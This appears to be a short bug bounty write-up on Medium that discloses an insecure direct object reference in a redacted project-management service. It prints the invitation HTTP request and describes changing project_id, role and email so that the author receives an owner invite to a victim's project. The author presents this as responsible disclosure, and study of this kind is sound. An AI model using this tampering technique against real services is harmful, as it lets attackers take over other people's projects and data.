IDOR Leads To Project Takeover

Hariharan.s
Jun 9, 2019 · 1 min read

It's all about Changes

Hi Guys,

This is my second bug bounty write up of how i managed to takeover a victims project using collaboration Invite.

A redacted.com is running a online project management service and people can post comments,images,files etc of their work on a single project. The admin of the project can add users as collaborators of the project.

The request of the collaboration invite was like this..

POST /project_api/project_invitation HTTP/1.1
Host: redacted.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://redacted.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 121
Connection: close

x_token=748f5bba976e3a202a7dbfa939271cde11e260fa52b7bbe4f3a024d80d08df92&project_id=5401234&role=1&emails=test%40test.com

And when i saw the request i thought..What If I

So we have 3 Request Parameters:

project_id=

role=

emails=

I Changed the request to:

project_id= Victims Project ID

role=0 (0=Owner, 1=Editor)

emails= My Email

I forwarded the request and ..

Checked my inbox and there it was ..A Collaboration Invite to the victims project as a owner . I was able to edit, delete, add more users, remove the original owner of the project etc

And i was like

I immediately reported the bug and recieved a good 3 digit bounty :)

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store